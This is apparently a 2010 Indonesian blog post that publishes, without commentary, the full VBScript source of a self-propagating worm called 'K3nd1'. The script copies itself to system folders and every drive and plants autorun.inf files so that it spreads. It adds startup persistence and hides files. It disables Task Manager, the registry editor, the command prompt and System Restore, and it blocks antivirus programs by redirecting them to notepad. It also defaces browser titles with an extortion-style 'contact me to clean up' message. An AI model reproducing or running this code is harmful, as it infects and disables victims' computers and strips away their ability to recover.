kendi.vbs

on error resume next

dim a,b,c,d,e,f,g,h,K3nd1,j,l,m,n

h = "[autorun]" & vbcrlf & "shellexecute=wscript.exe K3nd1.vbs"

set a = createobject("Scripting.filesystemobject")

set b = a.getfile(Wscript.ScriptFullname)
a.CopyFile "K3nd1.vbs", "C:\WinNT.Dat"

a.CopyFile "K3nd1.vbs", "C:\Windows\System32\K3nd1.vbs"

a.CopyFile "K3nd1.vbs", "C:\Winnt\System32\K3nd1.vbs"

n = b.size
i = b.drive.drivetype

set m = b.openastextstream(1,-2)

do while not m.atendofstream
c = c & m.readline
c = c & vbcrlf
loop

Set d = a.getspecialfolder(0)
a.CopyFile WScript.ScriptFullname(d & "\K3nd1.jpg.vbs")
Set e = a.getspecialfolder(1)
a.CopyFile WScript.ScriptFullname(e & "\K3nd1.vbs")
set f = a.getfile(e & "\K3nd1.vbs")
f.attributes = 32
set f = a.createtextfile(e & "\K3nd1.vbs",2,true)
f.write c
f.close
set f = a.getfile(e & "\K3nd1.vbs")
f.attributes = 39

for each g in a.drives
If (g.drivetype = 1 or g.drivetype = 2) and g.path <> "A:" then
set f = a.getfile(g.path &"\K3nd1.sys.vbs")
f.attributes = 32
set f = g.createtextfile(g.path &"\K3nd1.vbs",2,true)
f.write c
f.close
set f = a.getfile(g.path &"\K3nd1.vbs")
f.attributes = 39
set f = a.getfile(g.path &"\autorun.inf")
f.attributes = 32
set f = a.createtextfile(g.path &"\autorun.inf",2,true)
f.write h
f.close
set f = a.getfile(g.path &"\autorun.inf")
f.attributes= 39
end if
Next

set K3nd1 = createobject("WScript.Shell")

K3nd1.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: I Like this ha ha ha ::"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"

K3nd1.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Hacked By QrembiezS ... Contact Me To Clean Up"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://qrembiezshack.blogspot.com"

K3nd1.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost",winpath&"\svchost.exe.vbs"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"

K3nd1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Virus K3nd1"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Di atas langit masih ada langit ... Tidak ada kata 100 persen aman dari virus ... jangan pernah sombong dengan system keamananmu!"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"

K3nd1.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","notepad.exe"

K3nd1.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMP.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmadAV 3.4.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GAV.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\evest.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVG.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Norton.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kaspersky.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\power remover.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Virus K3nd1"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"

K3nd1.Regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon\","shell32.dll,3"

a.CopyFile "C:\WinNT.Dat", "C:\Help.cfg"

a.CopyFile "C:\WinNT.Dat", "C:\WinNT.DAT"

a.CopyFile "C:\WinNT.dat", "a:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "b:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "c:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "d:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "e:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "f:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "g:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "h:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "i:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "j:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "k:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "l:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "m:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "n:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "o:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "p:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "q:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "r:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "s:s\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "t:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "u:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "v:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "w:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "x:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "y:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "z:\K3nd1.vbs"

if i <> 1 then

Wscript.sleep 200000

end if

do while i <> 1

set j = createobject("Wscript.shell")

j.run d & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
loop

Selasa, 02 Maret 2010

kendi.vbs

0 komentar:

Posting Komentar

Terbaru

Related Post

Entri Populer

Adsense

Blog Archive

Facebook

My Widget

Counter Statistik

tuKeran Link

Ilmu Komputer

KOMPAS

Tribunnews